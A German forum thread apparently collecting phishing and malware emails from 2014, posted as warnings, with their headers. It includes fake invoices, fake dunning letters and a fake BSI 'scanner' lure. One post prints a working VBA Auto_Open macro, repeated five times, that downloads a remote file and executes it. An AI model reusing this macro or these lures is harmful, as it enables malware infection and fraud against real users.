BIC: BIGBPLPW
Betrag: 101,00EUR
--------------------------------------

Bei Zahlung geben Sie bitte immer Ihr Kundenkonto als Verwendungszweck an.

Mit freundlichen Grüßen
Ihr laminatshop.de Team


-


der-laminatshop.de
U. B.
Bergiusstr. 4
46244 Bottrop

Eingeworfen wurde das hier:

Received: from mail-in-18.arcor-online.net (<mein Provider> [Adresse])
by <mein Provider> (Postfix) with ESMTP ID: [ID filtered]
for <meine Adresse>; Wed, 4 Jun 2014 xx:xx:xx +0200 (CEST)
Received: from bt.foo.org (cable-86-56-29-53.cust.telecolumbus.net [86.56.29.53])
by <mein Provider> (Postfix) with ESMTPS ID: [ID filtered]
for <meine Adresse>; Wed, 4 Jun 2014 xx:xx:xx +0200 (CEST)
Received: from bt.foo.org (localhost [127.0.0.1])
by bt.foo.org (8.14.3/8.14.3/Debian-9.1ubuntu1) with ESMTP ID: [ID filtered]
for <meine Adresse>; Wed, 4 Jun 2014 xx:xx:xx +0200

RATM1
04.06.2014, 16:43
Anwaltskanalei :eek:

Return-Path: d..l. [at] sfr.fr
Received: from smtp25.services.sfr.fr ([93.17.128.119]) by mx-ha.web.de (mxweb003) with ESMTP (Nemesis) ID: [ID filtered]
Received: from filter.sfr.fr (localhost [151.8.114.162]) by msfrf2516.sfr.fr (SMTP Server) with ESMTP ID: [ID filtered]
Received: from PC268 (mail.mep.it [151.8.114.162]) by msfrf2516.sfr.fr (SMTP Server) with ESMTP ID: [ID filtered]
X-SFR-UUID: [UID filtered]
From: Anwaltskanalei <d..l. [at] sfr.fr>

Schöne Zip im Gepäck... Automatische Lastschrift konnte nicht durchgeführt werden


Sehr geehrter Kunde,

das angegebene Konto wurde nicht ausreichend gedeckt um die Kontoabbuchung durchzuführen. Leider konnten wir bis zum heutigen Tag keinen Zahlungseingang auf unsere Geldforderung Nr. UHU-1234567 vom 01.04.2014 erkennen. Bestimmt handelt es sich dabei nur um ein Versehen.

Dabei wird Ihnen eine Mahngebühr von 11,00 Euro und die Kosten unserer Beauftragung von 32,59 Euro berechnet. Falls Sie diesen Zahlungstermin nicht einhalten, werden wir Ihnen weitere Kosten des Mahnverfahrens und Verzugszinsen in Rechnung stellen müssen. Die Rufnummer und weitere Informationen ersehen Sie in Ihrer Rechnung anbei im Anhang.

Die Zahlung erwarten wir bis spätestens 06.06.2014. Die Gesamtsumme der Bestellung entspricht 378,00 Euro.

Für Rückfragen oder Anregungen erwarten wir eine Kontaktaufnahme innerhalb des gleichen Zeitraums.

Mit freundlichen Grüßen.

T. B.

Silke074
04.06.2014, 17:05
From service [at] zooplus.de Wed Jun 4 xx:xx:xx 2014
X-Apparently-To: ... via 188.125.83.133; Wed, 04 Jun 2014 xx:xx:xx +0000
Return-Path: <slumpsig1 [at] zooplus.de>
X-YahooFilteredBulk: 91.81.44.130
Received-SPF: fail (domain of zooplus.de does not designate 91.81.44.130 as permitted sender)
X-YMailISG: izzerb8WLDtyLFG1_w8O50rn9d7vheeY40trBZHHS.woOSvO
WY0FNi2Cp4_eaaal9IrphL7kL1qd96mu0XI53_CDEJ6H7ctDA41Hl72Oo1Cw
fRFHzxHQDUmRoayOHTqeyTtKbfK9deP6ASSVG_KapghLKtLjiKrrArnKutLi
BPKnpnDjdkoJE2Yht7L9baCfByhB2HFSrefADB7XkNJyN9aRaXpRqfhK59cA
EK_qMqydAQpdiXUb7RrVTN87xlvRCgaRUfEe773fo3bhngZHWcHOBNaoTgL9
sEBHayzONy_gQuln.QO0rTBM04bb9AkJTc8TzM9GSCFRUssplja.W6A7nYeF
trogUThrLHK_wnD2dEvVioyEQbLYbniNnfe.9m667z2fxEv.gy8eeXLI2mcl
iiivDVHl3TI78AVjJ7I2.0prlfkK0B1eJIb5OoT_9hMNuaLQtpbfqM2.Jkwd
qK1KtZTtaVTCSzzIDPXa__lEwLVGAVh5qI9ePc8xHkY2u3ATMLEIARkjYxIB
LZGvaSoTJB0SZpcKsJzVuMr7ot0aXz8Z6EHkxxGcCycl2i.EVTjjM83IxfwN
zLFpnrL5OxEG6_hDjNwhxaV8bLOhA7b_okap_ejiGALH61EygO5t3HbjCAL5
ZiHx0398PmDVh89hEtc6M8KwBcGT1FgGDxYxbboIzcHo3Vuez924wpK2.1vD
7EsrB4c9Whdenbm4JC5m90RBPCEMHT9jDGxiWbe1drYg9LpKFfnqMlcfTYla
YezJSGMERpMBiar_SotX5O9H4EJXesCWCEaJlUWTUyNin7dDajbcVW9h6UcS
Vb_6qx96GhbxyaqVnpnbBJLmnQ75IshLYHsCoiFXyrrhvSdsHSmmO.czobA9
mNqpxsGzojHyMbvn1TOPxBhXp4jQq6bgbsdftXWU3PatQvbTef.YZRrOCnUX
XVHtfgkmRqYTQkrdomRC8507RLss0g7cFwpNyVcTsjQ5TcJjZEALaNlNNG0t
kgPUc2xb75vb90VcoyLRFb.tmNrKY.kDEY_PEl4ovA0CIFJW6wyPBETJy2lk
dj6XZK_RkCPkhTXtPTi224n03trQ3JBqMEjXb4Thl0vWRWYSXTABY6XL1zIE
bFh_3QprSXrxnTDyujoQUxwk9Rw8wxuiuKoEOcoFTynr_vE2n9KZ7s8mYYgv
tpToOm6igjFF2bouansE.xdNG9j5IxPB32P4zmQDjFTBaZKCGi0033hOjVk8
LuXYkXmK6QK2hyJ7rlK2I26bQGIwMbzM9X7hPicEFyn4GyhPparWMzhZOwOf
.80dgrjKm8JFMZQHfQ3bNRs6kj3e3uZd2uOWUvkqmzwjy6yzzLG16uA2.Axz
7lyLnDZLkkuA5SCw4kxk42iqVqU283StuvEW4LxfeQ0TGERb50lporwtFFWS
U8hZCYRPsULRPhErHxnwDUJGHg3INIjrViVd3jnvaDdjSnKPmNba9Aj1QISV
ayev0BaZCsRf9M8qhvvmTuj32MGiqEUT7bHFNcNGGyj5SbJoJwpYpejk_8yf
tr2lFlhiZtFkrjX1.uWey9z3x7LiL4O5aTmHgvwTa7Ucbw--
X-Originating-IP: [91.81.44.130]
Authentication-Results: mta1168.mail.ir2.yahoo.com from=zooplus.de; domainkeys=neutral (no sig); from=zooplus.de; dkim=neutral (no sig)
Received: from 188.125.83.133 (188.125.83.133) by 46.228.37.117(46.228.37.117); Wed, 04 Jun 2014 xx:xx:xx +0000
Received: from 127.0.0.1 (EHLO it) (91.81.44.130)
by mta1168.mail.ir2.yahoo.com with SMTP; Wed, 04 Jun 2014 xx:xx:xx +0000
Received: from [96.60.10.64] (account administeredo2 [at] zooplus.de HELO qmskw.sdzavn.tv)
by it (CommuniGate Pro SMTP 5.2.3)
with ESMTPA ID: [ID filtered]
Received: from [186.23.37.86] (account administeredo2 [at] zooplus.de HELO ktrwmmuqsbswe.hgxxcrah.com)
by it (CommuniGate Pro SMTP 5.2.3)
with ESMTPA ID: [ID filtered]
Date: Wed, 4 Jun 2014 xx:xx:xx +0100
From: service [at] zooplus.de
To: <...>
Subject: Ihre Rechnung von zooplus
MIME-Version: 1.0
X-Priority: 3
Message-ID: [ID filtered]
Content-Type: multipart/mixed;
boundary="----=a__lqpgpy_72_57_49"
Content-Length: 237036





Guten Tag,

vielen Dank für Ihre Bestellung 21562726.

Für Ihre Unterlagen erhalten Sie anbei die dazu gehörige Rechnung als Anhang im pdf-Format. Sie können diese abspeichern oder bei Bedarf ausdrucken.

Sollten Sie weitere Fragen zu Ihrer Bestellung haben, erreichen Sie unseren Kundenservice über unser Kontaktformular. Klicken Sie dazu bitte hier:

https://www.zooplus.de/kontakt

Ihr zooplus
Service-Team

rechnung zooplus.pdf .zip


Ich hoffe, ich habe alles korrekt anonymisiert.

Bei Zooplus habe ich vor Jahren mal, einen Käfig für meine Meersauen bestellt. Die Rechnung kam damals mit dem Paket. Wobei ich nicht mehr weiss, ob das über die Mail-Adresse lief, an die diese Mail gekommen ist.

Mittwoch
16.06.2014, 17:58
Return-Path: gasetz [at] zwiorek.de
Received: from rgpkkyer.riklen.pw ([88.132.27.66]) by mx-ha.web.de (mxweb109)
with ESMTP (Nemesis) ID: [ID filtered]
Mon, 16 Jun 2014 xx:xx:xx +0200
Message-ID: [ID filtered]
Date: Mon, 16 Jun 2014 xx:xx:xx +0200
From: "Anija Wegener" <gasetz [at] zwiorek.de>

Betreff: Schein 1359177
Guten Tag,

Vergessen Sie nicht: Sie schulden 57.87 Euro per 12.06.14!

Anija Wegener
+49 3583 2[schnippschnapp]
Angehängt an die Mail ist eine Datei "gesetzentwurf_1359177.doc", die zwar vorgibt, eine Word-Datei zu sein, aber nur eine leere Hülle für sog. Makros ist. Auf diese Weise wird Schadcode ins System eingeschleust, an den Virenscannern vorbei. Laut Virusotal wird die Datei noch von keinem Scanner beanstandet (https://www.virustotal.com/de/file/6acd1fb07bf6566289108a436a80cee6f4e20184b24879dcf81dccae7ba000dd/analysis/1402933205/) (Stand: 16.06.2014, 17:40 Uhr MESZ).

Ich habe wenig Ahnung von Makro-Quelltexten, weiß daher nicht, was die folgenden enthaltenen Makros machen:
Makroname: Auto_Open

Rem Attribute VBA_ModuleType=VBADocumentModule
Option VBASupport 1
Sub Auto_Open()
YVFDXNTOHWT
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Function GRPGFHKOSHI(ByVal SVBUWHUNJWT As String, ByVal CMYATDWOVAO As String) As Boolean
Dim TPOORILDSDL As Object, VGNOIZXJPBH As Long, MOCHEOHRDMH As Long, EBLGIQMBFDP() As Byte

Set TPOORILDSDL = CreateObject("Microsoft.XmlHttp")
TPOORILDSDL.Open "GET", SVBUWHUNJWT, False
TPOORILDSDL.Send "123"

Do While TPOORILDSDL.readyState <> 4
DoEvents
Loop

EBLGIQMBFDP = TPOORILDSDL.responseBody

MOCHEOHRDMH = FreeFile
If Dir(CMYATDWOVAO) <> "" Then Kill CMYATDWOVAO
Open CMYATDWOVAO For Binary As #MOCHEOHRDMH
Put #MOCHEOHRDMH, , EBLGIQMBFDP
Close #MOCHEOHRDMH

Dim RRSNFVXRLLM
RRSNFVXRLLM = Shell(CMYATDWOVAO, 1)

Set TPOORILDSDL = Nothing

End Function
Sub YVFDXNTOHWT()
GRPGFHKOSHI "http://carhiresoft.com/img/calc.png", Environ("USERPROFILE") & "\useradmin.com"
End Sub
Makroname: AutoOpen


Rem Attribute VBA_ModuleType=VBADocumentModule
Option VBASupport 1
Sub Auto_Open()
YVFDXNTOHWT
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Function GRPGFHKOSHI(ByVal SVBUWHUNJWT As String, ByVal CMYATDWOVAO As String) As Boolean
Dim TPOORILDSDL As Object, VGNOIZXJPBH As Long, MOCHEOHRDMH As Long, EBLGIQMBFDP() As Byte

Set TPOORILDSDL = CreateObject("Microsoft.XmlHttp")
TPOORILDSDL.Open "GET", SVBUWHUNJWT, False
TPOORILDSDL.Send "123"

Do While TPOORILDSDL.readyState <> 4
DoEvents
Loop

EBLGIQMBFDP = TPOORILDSDL.responseBody

MOCHEOHRDMH = FreeFile
If Dir(CMYATDWOVAO) <> "" Then Kill CMYATDWOVAO
Open CMYATDWOVAO For Binary As #MOCHEOHRDMH
Put #MOCHEOHRDMH, , EBLGIQMBFDP
Close #MOCHEOHRDMH

Dim RRSNFVXRLLM
RRSNFVXRLLM = Shell(CMYATDWOVAO, 1)

Set TPOORILDSDL = Nothing

End Function
Sub YVFDXNTOHWT()
GRPGFHKOSHI "http://carhiresoft.com/img/calc.png", Environ("USERPROFILE") & "\useradmin.com"
End Sub
Makroname: WordBookOpen


Rem Attribute VBA_ModuleType=VBADocumentModule
Option VBASupport 1
Sub Auto_Open()
YVFDXNTOHWT
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Function GRPGFHKOSHI(ByVal SVBUWHUNJWT As String, ByVal CMYATDWOVAO As String) As Boolean
Dim TPOORILDSDL As Object, VGNOIZXJPBH As Long, MOCHEOHRDMH As Long, EBLGIQMBFDP() As Byte

Set TPOORILDSDL = CreateObject("Microsoft.XmlHttp")
TPOORILDSDL.Open "GET", SVBUWHUNJWT, False
TPOORILDSDL.Send "123"

Do While TPOORILDSDL.readyState <> 4
DoEvents
Loop

EBLGIQMBFDP = TPOORILDSDL.responseBody

MOCHEOHRDMH = FreeFile
If Dir(CMYATDWOVAO) <> "" Then Kill CMYATDWOVAO
Open CMYATDWOVAO For Binary As #MOCHEOHRDMH
Put #MOCHEOHRDMH, , EBLGIQMBFDP
Close #MOCHEOHRDMH

Dim RRSNFVXRLLM
RRSNFVXRLLM = Shell(CMYATDWOVAO, 1)

Set TPOORILDSDL = Nothing

End Function
Sub YVFDXNTOHWT()
GRPGFHKOSHI "http://carhiresoft.com/img/calc.png", Environ("USERPROFILE") & "\useradmin.com"
End Sub
Makroname: GRPGFHKOSHI


Rem Attribute VBA_ModuleType=VBADocumentModule
Option VBASupport 1
Sub Auto_Open()
YVFDXNTOHWT
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Function GRPGFHKOSHI(ByVal SVBUWHUNJWT As String, ByVal CMYATDWOVAO As String) As Boolean
Dim TPOORILDSDL As Object, VGNOIZXJPBH As Long, MOCHEOHRDMH As Long, EBLGIQMBFDP() As Byte

Set TPOORILDSDL = CreateObject("Microsoft.XmlHttp")
TPOORILDSDL.Open "GET", SVBUWHUNJWT, False
TPOORILDSDL.Send "123"

Do While TPOORILDSDL.readyState <> 4
DoEvents
Loop

EBLGIQMBFDP = TPOORILDSDL.responseBody

MOCHEOHRDMH = FreeFile
If Dir(CMYATDWOVAO) <> "" Then Kill CMYATDWOVAO
Open CMYATDWOVAO For Binary As #MOCHEOHRDMH
Put #MOCHEOHRDMH, , EBLGIQMBFDP
Close #MOCHEOHRDMH

Dim RRSNFVXRLLM
RRSNFVXRLLM = Shell(CMYATDWOVAO, 1)

Set TPOORILDSDL = Nothing

End Function
Sub YVFDXNTOHWT()
GRPGFHKOSHI "http://carhiresoft.com/img/calc.png", Environ("USERPROFILE") & "\useradmin.com"
End Sub
Makroname: TPOORILDSDL


Rem Attribute VBA_ModuleType=VBADocumentModule
Option VBASupport 1
Sub Auto_Open()
YVFDXNTOHWT
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Function GRPGFHKOSHI(ByVal SVBUWHUNJWT As String, ByVal CMYATDWOVAO As String) As Boolean
Dim TPOORILDSDL As Object, VGNOIZXJPBH As Long, MOCHEOHRDMH As Long, EBLGIQMBFDP() As Byte

Set TPOORILDSDL = CreateObject("Microsoft.XmlHttp")
TPOORILDSDL.Open "GET", SVBUWHUNJWT, False
TPOORILDSDL.Send "123"

Do While TPOORILDSDL.readyState <> 4
DoEvents
Loop

EBLGIQMBFDP = TPOORILDSDL.responseBody

MOCHEOHRDMH = FreeFile
If Dir(CMYATDWOVAO) <> "" Then Kill CMYATDWOVAO
Open CMYATDWOVAO For Binary As #MOCHEOHRDMH
Put #MOCHEOHRDMH, , EBLGIQMBFDP
Close #MOCHEOHRDMH

Dim RRSNFVXRLLM
RRSNFVXRLLM = Shell(CMYATDWOVAO, 1)

Set TPOORILDSDL = Nothing

End Function
Sub YVFDXNTOHWT()
GRPGFHKOSHI "http://carhiresoft.com/img/calc.png", Environ("USERPROFILE") & "\useradmin.com"
End Sub


Wie immer gilt: Öffnen Sie keinesfalls den Anhang! Wenn sie es doch tun, sollte Word fragen, ob Sie die Makros ausführen möchten. Beantworten Sie dies mit Nein!

kjz1
16.06.2014, 19:50
Ich würde sagen, da soll per Macro etwas (Virus) heruntergeladen wrden.

homer
17.06.2014, 08:10
Jupp, und zwar die calc.png von http://carhiresoft.com/img/. Damit können die Virenscanner dann schon mehr anfangen (https://www.virustotal.com/de/file/5168d4763d039dedfa4c7c07138c0a5e341c813c1ed7c8e934ceaf76340c1749/analysis/).
Anscheinend werden auch noch einige Umgebungsvariablen des Windoof-Nutzers mit übermittelt.

Speedy56
17.06.2014, 08:18
@Mittwoch: mittlerweile wird deine Datei von VirusTotal erkannt!

DJANGO
17.06.2014, 12:17
Wieder mal wird gephisht mit der Telekom-Rechnung, natürlich auf meinem .gmx-Account:

Kundenservice Rechnungonline Telekom

Sehr geehrte Damen und Herren,

im Anhang an diese Nachricht finden Sie die Rechnung 52918771 als PDF-Datei beigefügt:
Ihre Festnetz Rechnung für Juni 2014 #52918771.zip.

Die Gesamtsumme im Monat Juni 2014 beträgt: 277,98 Euro.

Mit freundlichen Grüßen
Ihre Telekom
Dabei hat die Telekom meine Rechnung über 35,95 grad abgebucht.....:)

Return-Path: 826541313233-0001 [at] telekom.de
Received: from mx.odn.de ([212.34.160.79]) by mx-ha.gmx.net (mxgmx105) with ESMTPS (Nemesis) ID: [ID filtered]
Received: from imapmaster1.odn.de (imapmaster1.odn.de [212.34.175.253]) by mx.odn.de (8.13.8/8.13.8) with ESMTP ID: [ID filtered]
Received: from fm-pc (h081217024147.dyn.cm.kabsi.at [81.217.24.147]) (authenticated bits=0) by imapmaster1.odn.de (8.13.4/8.13.4) with ESMTP ID: [ID filtered]
Date: Tue, 17 Jun 2014 xx:xx:xx +0200
From: "826541313233-0001 [at] telekom.de" <nv206 [at] odn.de>
To: poor [at] spamvictim.tld
X-MSMail-Priority: High
X-Priority: 1
Priority: urgent
Importance: high
X-MimeOLE: Produced by Blat v3.1.1
X-Mailer: Blat v3.1.1, a Win32 SMTP/NNTP mailer http://www.blat.net
Message-ID: [ID filtered]
Subject: =?ISO-8859-1?Q?Ihre_Festnetz-Rechnung_f=FCr_Juni_2014_=23103682562?=
Content-Transfer-Encoding: 8BIT
Content-Type: text/html; charset="ISO-8859-1"
Envelope-To: <poor [at] spamvictim.tld>
X-GMX-Antispam: 0 (Mail was not recognized as spam); Detail=V3;
X-GMX-Antivirus: 0 (no virus found)
X-UI-Filterresults: notjunk:1;V01:K0:ouNPMHrUBPc=:u3benfJo+r1cgxlZIRzGgod8Pd eNZ54twWED8zIEPjps8foUtyr5T7ddMc1+oUuJp1j0FD53dNpnuIhn6+qFINyOAjKtSyUIXnC AU0zIwyWqUsmTWNZq8RB1RRvrq33RalpMAN5/MQ8guT7+2w0si3pMdUPSOerA18zZgVITcCH3 /K7gzVsCS+2QwslGlvgehXMXHtYssPrMSkqazvYv76F0Y/7p4N0WWnM/HSU13g57MQtF5TzPY vaj0Oo9BUbFjWbgB6BiwPv15mm/lkq+OMwiEHOME9td5ti85fbHskJ9TyL8axVmjJH8Gwbopn AWnbVwa+E99XBCOq9Xz89+xd+NurYUjvCULuSguGxiLHkXegTxCD3chHlMm87vwdAnk6+AVY6 wzLUJPnoKCZo47+D2ebSQL5srhcs92W+S4ljRzRd8GNe1/QanSp6hWpbTpvRMhhhtekvG2Vw+ i7Hlhcr1k0MQrwqA7GPcjrjHSYGPbKS0Tu4Umk8mHheFm89FwIICDbZRKvwaLI3kgWReoP01U K+eFaWRf4ttcHemrJX6smffCm75a0k59q1ybQapyCZBqFXOGsvaW+R31kqg0J1s10eQjlbD6f cPA9PmnTUK3GAaE2Ff+PX4HGlh2JbYGzBZllIewJ2ovP0qOORoNwgQtqi0DInKGkUyvq/6tDx RW1ASYeumFwYQb/J6+v/QjBarLBUxljKNkS3d6zPQCC3q94I4JVT4vwr5iOqBIzzlWf+FJOLD gQzIlugVMgDfjDSlPeHVuDZ8eCWaiRM0e5c0f4YIjqvnG38s9WYvorC7SlL5dsJtxQDkmNsLu Ivhel2zHwZkpLKphASMVwuPYMWXWCjDcDhoFbbsyNXQJr1MTikvVEZlLcNMGeI8JUwdQ0kH95 9Zbncpi7JU+h9YlYaHgHAsP/9WvZq4bPGDR6sfw88Mg8z6Y5MZh3Sc/Fu9n34qn2kp1NESPvR kN8qYfnVUUCJXy6xTAf+WGSNtJnl1whAUCj5gX6rhj1elPcSILlnmnOfQepn91Z3mdCJabjPc Bav84kyC6ER8jb7LkeOQJyIlbHD1Fk+dnzk4IWI9IzfmUnkC8ckNuJQlm78Ke7XF+Rn/fm04Y r5QXYMYR50v7zqqJHkTDPqOBC9GdYhqv4tBO5ZC4//9MiGIG/q4YDAn7FdBCLd9qPn7NkaSe8 9xpXA1zTuynRKHPW5j3umYT96F83HzwhxTut7c0AulJ5RumztCmMw4kLEtVyBtL/lBBFFoNWf ad5kvVxJKjA0wh/U71gAzRSJEymvSKxON6Ao3HgywTF6BVDqGHxiLJMT58FvCtkP3oGIXEIeY 3HiwZRLiq1bwUqHzEii8QJ/4Q6QYzOvsODo7ZT09cjT/KMWzHD8B9THOZU80brwCO/TdiRQro Fd8mDY1dLu7aJ76SmU7hETziQJyPYBTR29v7GrdDcs4oSI37PkkqG4XGmjc

truelife
18.06.2014, 12:33
Hier ist auch eine ähnliche Spam-Mail aufgeschlagen. Header liefere ich nach.

Das Macro will auch hier eine Datei nachladen und ausführen. Im hiesigen Fall liegt die Datei hier: http://31.6.71.83/xampp/file und nennt sich pay.exe - diese wird heruntergeladen und ausgeführt.

Die pay.exe kann unter anderem die Zwischenablage überwachen und die Tastaturanschläge protokollieren. Ausserdem wird ein Port geöffnet, hier ergeben sich dann alle Möglichkeiten einer klassischen Backdoor.

kjz1
23.06.2014, 13:49
Man ist weiter in Sachen Telekom unterwegs:

Received: from erik.webico.net ([212.18.63.32]) by mx-ha.gmx.net (mxgmx112) with ESMTPS (Nemesis) ID: [ID filtered]
Received: from [2.171.124.212] (port=52314 helo=sekretariat) by erik.webico.net with esmtpa (Exim 4.82) (envelope-from <52364244844357-kundenservice.rechnungonline [at] t-mobile.de>) ID: [ID filtered]

IP: 2.171.124.212 ---> T-Mobile

gecrackt: X-Get-Message-Sender-Via: erik.webico.net: authenticated_ID: [ID filtered]


Telekom - erleben, was verbindet.
Ihre Rechnung für Juni 2014

Sehr geehrte Damen und Herren,
dieser Nachricht ist Ihre aktuelle Rechnung angehängt. Höhe des
Rechnungsbetrags für Juni 2014: *241,16 Euro*.

Im Anhang finden Sie die gewünschten Dokumente zu Ihrer Mobilfunk
RechnungOnline
für Juni 2014.
Dies ist eine im automatischen Modus generierte E-Mail. Bitte nicht darauf
antworten.
Mit freundlichen Grüßen

Ralf Hoßbach
Leiter Kundenservice
© Deutsche Telekom AG 2014

Virus im Anhang: 2014_06rechnung_93911723755883_sign.zip

Mittwoch
23.06.2014, 18:29
Man ist weiter in Sachen Telekom unterwegs:
dito, gleicher Text, gleicher Schädling

Return-Path: 5430022863-kundenservice.rechnungonline [at] email-telekom.de
Received: from v2081610.home.net.pl ([89.161.251.80]) by mx.kundenserver.de
(mxeue006) with ESMTP (Nemesis) ID: [ID filtered]
<blah [at] blubb.tld>; Mon, 23 Jun 2014 xx:xx:xx +0200
Return-Path: <5430022863-kundenservice.rechnungonline [at] email-telekom.de>
Received: from 80.150.146.219 [80.150.146.219] (HELO dedt00058)
by dbschenker.home.pl [89.161.251.80] with SMTP (IdeaSmtpServer v0.80)
ID: [ID filtered]
Date: Mon, 23 Jun 2014 xx:xx:xx +0200
From: 5430022863-kundenservice.rechnungonline [at] email-telekom.de
<michal.guzek>
Was Virustotal zu der angehängten Datei "2014_06rechnung_81795342634152_sign.zip" sagt. (https://www.virustotal.com/de/file/76259d9953eea3f2d08faff28efb846fd98f4614d9da85dbcf16000b6440205f/analysis/1403540907/)

madman70
24.06.2014, 09:10
Und mal wieder ein Trojaner...



Sehr geehrte/r madman70,

leider konnten wir bis jetzt keinen Zahlungseingang auf unsere Mahnung Nummer 85FO72936127 vom 01.05.2014 feststellen. Das gespeicherte Konto wurde nicht ausreichend gedeckt um die Lastschrift auszuführen. Bestimmt handelt es sich dabei um ein Versehen Ihrerseits die Rückbuchung von Ihrem Konto nicht zu berücksichtigen.

Die Zahlung erwarten wir bis spätestens 25.06.2014. Für Rückfragen oder Anregungen erwarten wir eine Kontaktaufnahme innerhalb des gleichen Zeitraums. Dabei wird Ihnen eine Mahngebühr von 15,00 Euro und die Kosten unserer Beauftragung von 21,88 Euro berechnet. Falls Sie diesen Zahlungstermin nicht einhalten, werden wir Ihnen weitere Kosten des Mahnverfahrens und Verzugszinsen in Rechnung stellen müssen. Die Rufnummer und weitere Informationen ersehen Sie in Ihrer Rechnung im Anhang. Es erfolgt keine weitere Mahnung. Nach Ablauf der Frist wird die Angelegenheit dem Gericht und der Schufa übergeben.

Mit freundlichen Grüßen

Paypal GmbH

Johann Altdorfer


Drangetackert ein Zip (mit meinem richtigen Namen als Teil des Dateinamens), Virustotal findet diese auch suspekt:

https://www.virustotal.com/de/file/89d31b3ee15a6e8351e10244f1b66df116cd2aa6da0ec74b06568f0cbb4e31c6/analysis/1403591975/

Hier wär noch ein Header:


Return-Path: SRS0=Wpwiim=3V=lichtaffen.com=ara [at] yourhostingaccount.com
Received: from walmailout01.yourhostingaccount.com ([65.254.253.94]) by
mx-ha.web.de (mxweb002) with ESMTP (Nemesis) ID: [ID filtered]
<xxxxx [at] web.de>; Tue, 24 Jun 2014 xx:xx:xx +0200
Received: from mailscan07.yourhostingaccount.com ([10.1.15.7] helo=walmailscan07.yourhostingaccount.com)
by walmailout01.yourhostingaccount.com with esmtp (Exim)
ID: [ID filtered]
for poor [at] spamvictim.tld; Tue, 24 Jun 2014 xx:xx:xx -0400
Received: from impout02.yourhostingaccount.com ([10.1.55.2] helo=impout02.yourhostingaccount.com)
by walmailscan07.yourhostingaccount.com with esmtp (Exim)
ID: [ID filtered]
for poor [at] spamvictim.tld; Tue, 24 Jun 2014 xx:xx:xx -0400
Received: from walauthsmtp03.yourhostingaccount.com ([10.1.18.3])
by impout02.yourhostingaccount.com with NO UCE
ID: [ID filtered]
X-Authority-Analysis: v=2.0 cv=aPZyWMBm c=1 sm=1
a=twKuAYgNemD0tAhmYY90iQ==:17 a=JImFCzYbV30A:10 a=dOjLrCZ76HsA:10
a=0MHK4jAVtT8A:10 a=jPJDawAOAc8A:10 a=6oAyoD6DAAAA:8 a=5TRlC4tyEwFm18yixNoA:9
a=QEXdDO2ut3YA:10 a=WU6WW0ce-bMA:10 a=zCHD0xgTAAAA:8 a=vu8TYRudo3FPnQEoK5MA:9
a=IKIoO-ieCDEA:10 a=maIvl2Yd+fJND/e85XqkCw==:117
X-EN-OrigOutIP: 10.1.18.3
X-EN-IMPSID: [ID filtered]
Received: from p3ee1dff3.dip0.t-ipconnect.de ([62.225.223.243]:4321 helo=carme-6ae4fb9a0)
by walauthsmtp03.yourhostingaccount.com with esmtpsa (TLSv1:RC4-MD5:128)
(Exim)
ID: [ID filtered]
for poor [at] spamvictim.tld; Tue, 24 Jun 2014 xx:xx:xx -0400
From: "Beauftragte Anwaltschaft Paypal GmbH" <ara [at] lichtaffen.com>
To: "xxxxx" <poor [at] spamvictim.tld>
Subject: =?utf-8?q?Ihre Paypal Lastschrift konnte nicht durchgef=C3=BChrt werden.?=
Date: Tue, 24 Jun 2014 xx:xx:xx GMT
Message-ID: [ID filtered]
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_00C5_6FF05BA4.18E3B606"
X-EN-UserInfo: 327548d30883816b5e53b0db26708bd0:931c98230c6409dcc37fa7e93b490c27
X-EN-AuthUser: ara [at] lichtaffen.com
Sender: "Beauftragte Anwaltschaft Paypal GmbH" <ara [at] lichtaffen.com>
X-EN-OrigIP: 62.225.223.243
X-EN-OrigHost: p3ee1dff3.dip0.t-ipconnect.de
Envelope-To: <poor [at] spamvictim.tld>

carkiller08
28.06.2014, 00:40
Received: from bluemind.sige.ch ([46.140.101.171]) by SNT004-MC3F1.hotmail.com with Microsoft SMTPSVC(7.5.7601.22712);
Thu, 26 Jun 2014 xx:xx:xx -0700
Received: by bluemind.sige.ch (Postfix, from userID: [ID filtered]
ID: [ID filtered]
X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on bluemind.sige.ch
X-Spam-Level: *
X-Spam-Status: No, score=1.7 required=5.0 tests=ALL_TRUSTED,BAYES_50,
HTML_MESSAGE,MISSING_MIMEOLE autolearn=no version=3.3.2
Received: from www.bund-bsi.de (85-10-243-215.clients.your-server.de [85.10.243.215])
(Authenticated sender: admin [at] sige.ch)
by bluemind.sige.ch (Postfix) with ESMTPA ID: [ID filtered]
for <***>; Fri, 27 Jun 2014 xx:xx:xx +0200 (CEST)
MIME-Version: 1.0
From: "support [at] bund-bsi.de" <support [at] bund-bsi.de>
Reply-To: support [at] bund-bsi.de
To: NichtmeinName ****" <***>
Subject: =?utf-8?Q?Bundesamt_f=C3=BCr_Sicherheit_in_der_Informationstechni?=
=?utf-8?Q?k_-_Sicherheitsscanner?=



Sehr geehrter Internetnutzer,

Wichtige Sicherheitshinweise!

es wurden verdächtige Aktivitäten von Ihrer IP-Adresse [***.**.***.**] festgestellt.
Zum Schutze Ihrer eigenen Privatsphäre und vor der strafrechtlicher Verfolgung wird Ihnen geraten den Sicherheitsscanner des Bundesamtes für Sicherheit in der Informationstechnik herunterzuladen.
Um dann wieder vollkommen sicher im Internet surfen zu können, führen sie den Sicherheitsscanner auf Ihren PC aus.
Es wird ein tiefer Systenscann gemacht, um Schadsoftware auf Ihren Pc zu lokalisieren die Ihre Netzwerkverbindung benutzt.
Es sollte in Ihrem Interessen sein, das sie keine strafrechtliche Konsequenzen zu befürchten haben weil andere Internetnutzer Ihre IP-Adresse zum surfen im Internet verwenden und Sie wieder sicher surfen können.

Gehen Sie auf dem Link und downloaden Sie den Sicherheitsscanner!
(Bei manchen Antiviren-Programmen wird der Scanner selbst als solcher erkannt, da das Programm einen tiefen Systemscann macht. Damit der Scanner wirklich 100% funktioniert, können sie Ihr Antivirenprogramm für die Zeit des Scanns ausschalten.)
